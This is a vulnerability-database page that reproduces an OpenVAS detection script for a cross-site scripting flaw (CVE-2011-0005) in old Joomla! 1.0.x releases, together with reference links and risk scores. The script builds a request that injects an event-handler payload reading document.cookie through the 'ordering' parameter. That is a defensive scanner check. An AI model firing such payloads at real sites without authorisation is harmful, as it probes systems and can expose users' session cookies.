Lucene search
+L

Joomla! XSS Vulnerability

🗓️ 27 Jan 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 29 Views

Joomla! 1.0.x-1.0.15 Cross Site Scripting Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-0005
6 Jan 201100:00
circl
cve
CVE
CVE-2011-0005
11 Jan 201101:00
cve
cvelist
Cvelist
CVE-2011-0005
11 Jan 201101:00
cvelist
exploitdb
Exploit DB
Joomla! 1.0.x - 'ordering' Cross-Site Scripting
6 Jan 201100:00
exploitdb
euvd
EUVD
EUVD-2011-0032
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-0005
11 Jan 201103:00
nvd
openvas
OpenVAS
Joomla! Cross Site Scripting Vulnerability
27 Jan 201100:00
openvas
prion
Prion
Cross site scripting
11 Jan 201103:00
prion
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:joomla:joomla";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.801827");
  script_version("2026-04-30T06:27:06+0000");
  script_tag(name:"last_modification", value:"2026-04-30 06:27:06 +0000 (Thu, 30 Apr 2026)");
  script_tag(name:"creation_date", value:"2011-01-27 07:47:27 +0100 (Thu, 27 Jan 2011)");
  script_cve_id("CVE-2011-0005");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Joomla! XSS Vulnerability");

  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/64539");
  script_xref(name:"URL", value:"http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2011 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("joomla_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("joomla/detected");

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to insert arbitrary HTML and
script code, which will be executed in a user's browser session in the context of an affected site.");

  script_tag(name:"affected", value:"Joomla! versions 1.0.x through 1.0.15");

  script_tag(name:"insight", value:"The flaw is caused by improper validation of user-supplied input via the
'ordering' parameter to 'index.php' which allows attackers to execute arbitrary HTML and script code on the web
server.");

  script_tag(name:"solution", value:"Upgrade to Joomla! 1.5.22 or later.");

  script_tag(name:"summary", value:"Joomla! is prone to a cross-site scripting (XSS) vulnerability.");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe:CPE))
  exit(0);

if (!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir + "/index.php?option=com_search&searchword=xss&searchphrase=" +
            "any&ordering=newest%22%20onmousemove=alert%28document.cookie%29" +
            "%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22";

if (http_vuln_check(port:port, url:url, pattern:'onmousemove=alert(document.cookie)', check_header: TRUE)){
  report = http_report_vuln_url( port:port, url:url );
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Apr 2026 00:00Current
4.7Medium risk
Vulners AI Score4.7
CVSS 24.3
EPSS0.01774
29